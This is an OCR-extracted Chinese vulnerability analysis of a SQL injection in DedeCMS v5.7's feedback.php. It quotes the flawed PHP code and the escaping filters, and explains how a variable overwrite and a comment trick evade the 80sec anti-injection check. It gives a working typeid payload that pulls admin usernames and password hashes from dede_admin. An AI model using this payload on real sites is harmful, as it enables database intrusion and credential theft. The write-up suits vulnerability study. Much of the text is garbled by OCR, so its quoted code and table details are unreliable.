法客周年慶dedecmsv57feedbackphp注入分析

1、Dedeems v5.7feedbac .php 注入分析該漏洞是cyg07在烏云提交的，漏洞文件：plusfeedback.php存在問(wèn)題的代碼：if($comt ype = comme nts)$arctitle = addslashes($title);if($msg!=”)/$typeid變量未做初始化$i nquery = INSERT INTO#_feedback(aid,ty peid,username,arctitle,i p,ischeck,dtime, mid,bad,good,fty pe,face,msg)VALUES ($aid,$t yp eid,$username

2、,$arctitle,$ ip ,$ischeck,$dtime, $cfg_ml-M_ID,0,0,$feedbackt yp e,$face,$msg); ”；echo $inquery;/調(diào)試，輸出查詢語(yǔ)句$rs = $dsql-ExecuteN on eQuery($i nq uery);if(!$rs)ShowMsgC發(fā)表評(píng)論錯(cuò)誤！，-1);/echo $dsql-GetError();exit();/引用回復(fù)elseif ($comt ype = repl y)$row = $dsql-Get On e(SELECT * FROM #_feedback WHERE id =$fid

3、); $arctitle = $rowarctitle;$aid =$rowaid;$msg = $quotemsg.$msg;$msg = HtmlRe place($msg, 2);$i nq uery = INSERT INTO#_feedback(aid,t yp eid,username,arctitle,i p,ischeck,dtime,mid,bad,good,fty p e,face,msg)VALUES($aid,$ty peid,$username,$arctitle,$i p,$ischeck,$dtime,$cfg_ml-M_ID,0,0,$feedbac ktyp

4、e,$face,$msg);$dsql-ExecuteN on eQuery($ inq uery);Q Q u 63=心心 I4 :書寺*畦NSERT NTO if_feedtKk fflid； typeid ；usname；arctitle/ip ；ischeclc；dtime； mid； bfld ；good ；ftype；face ；msg VALUES (iOflTF,沁 .-paHrac；! ?7.OjflLl；l1151774；. Q.fi.ti.lhack.Dr.rBfociJEfltEipflKinflc Team);完整的輸入語(yǔ)句，第二個(gè)參數(shù)typeid可控。INSERT

5、INTO #_feedback(aid,t yp eid,username,arctitle,i p ,ischeck,dtime, mid,bad,good,fty pe,face,msg) VALUES (108,2,游客,p axmac,127.0.0.1,1,1351774092, 0,0,0,feedback,0, nsfocus&p axmac team);想要利用注入，就要先了解下dedecms的防御機(jī)制。首先他對(duì)一切request進(jìn)來(lái)的參數(shù)都會(huì)進(jìn)行轉(zhuǎn)義，具體看代碼r皀ireonoe (dirnajoe (_FILE_J . V. . /include/cdian.inc-pha

6、); if cfg_ieedbaclc_crtjid=Y) exit (系繞已經(jīng)禁止評(píng)論功能【); reguire_Qnce $_v) $svar$_k = _Ru nM agicQuotes($_v);elseif( strle n($svar)0 &p reg_match(#A(cfg_|GLOBALS|_GET|_ POST|_COOKIE)#,$svar)exit(Request var not allow!);$svar = addslashes($svar);return $svar;foreach(AiTay(_GET,_ PO ST,_COOKIE) as $_request)

7、foreach($_request as $_k = $_v)if($_k = n varname) $_k = $_v;else $_k = _Ru nM agicQuotes($_v);從上面代碼可以看到他對(duì)外來(lái)的提交進(jìn)行了轉(zhuǎn)義處理，但是在filter.ini.php文件中fun ction _FilterAII($fk, &$svar)global $cfg_ no tallowstr,$cfg_re placestr; if( is_array($svar)foreach($svar as $_k = $_v)$svar$_k = _FilterAll($fk,$_v);elseif(

8、$cfg_ notallowstr!= & p reg_match(#.$cfg_ notallowstr.#i, $svar) ShowMsg(” $fk has not allow words!,-1);exit();if($cfg_re placestr!=)$svar = p reg_re place(7.$cfg_re placestr.7i, *, $svar);retur n $svar;/*對(duì) _GET,_ POST,_COOK進(jìn)行過(guò)濾 */ foreach(Array(_GET,_ PO ST,_COOKIE) as $_request) foreach($_request

9、as $_k = $_v)$_k = _FilterAll($_k,$_v);上面是處理敏感詞的代碼，但是又對(duì)變量進(jìn)行了注冊(cè)，導(dǎo)致了變量二次覆蓋 漏洞。其實(shí)這漏洞很早前就存在，之前的是因?yàn)閷?duì)提交的變量只檢查一維數(shù)組的key，可以被繞過(guò)從而創(chuàng)建不允許的系統(tǒng)配置變量，dedecms歷來(lái)的修改都讓人摸不著頭腦，修補(bǔ)的都是表面的東西，實(shí)質(zhì)導(dǎo)致漏洞問(wèn)題的原因不做修改。 從 這次的補(bǔ)丁看來(lái)，他就只加了一句判斷$typeid是否為數(shù)字，對(duì)于80sec的防注 入代碼2次被繞過(guò)還繼續(xù)無(wú)視。所以在GPC=OFF的時(shí)候，被轉(zhuǎn)義的變量又會(huì)被重新覆蓋而變成正常代碼。Eg：經(jīng)過(guò)覆蓋typeid=2 研究過(guò)上次dedecm

10、s SQL注入的問(wèn)題的同學(xué)肯定了解他的防注入機(jī)制。這里做下簡(jiǎn)單的分析。他對(duì)于 到之間的內(nèi)容作為可信任，不對(duì)其進(jìn)行檢查。所以我們只要把想利用的代碼放在內(nèi)就能躲過(guò)檢查。利用Mysql的一個(gè)語(yǔ)法,辭 II 昨他的值為空，下面來(lái)構(gòu)造漏洞exp:typ eid=123,0x11111,1111,1,1351739660, 0,0,0,0,0,(SELECT con cat( un ame,0x5f, pwd,0x5f) FROM dede_admi n) ),(108,1111我用tamper data 提交此參數(shù), &：L WOW&d： w北訓(xùn) GrrlTO/MlflCilO n-il4 xrnl.A

11、pplk.wtiDr!q=OL3-Fost Fw-hvkw NameactionidiceriHnnSVJ_7-d|Jflw*Srript 紳=E.ntti pocEt ddti nAm|=vAlu3Fort Fw-HVKtcr VdriufIOS呻仕 dbxk111其實(shí)這里也利用了一個(gè)小bug可以看到他的表結(jié)構(gòu)，只有msg可以為null，但是利用代碼中在user name 中#S字類坐整理屆性空默認(rèn)1idint(lO)umfcmed百無(wú)2aidmedfumintCS)UWSIGMED03typeldsmallint(5)UNSIGNED0j4username|Char(20)utfS_gen?ral_ci否5arctitkvarcha，r(6O)utf 8_general_ci否6ipcharClS)utf 8_general_ci否=1ischecksmallint 08dtimeint(lO)UNSIGNED019midinediumiriit(8)UNSIGNED否0:10badiTiedfumint(8)UNSIGNED否0311goodnnedrumint(8)UNSJGMED否0012ftypesetCfeedb3ckgood； bad)utf 8_general_ci否feedback13facesmallint(5UNSIGNED0114msgtex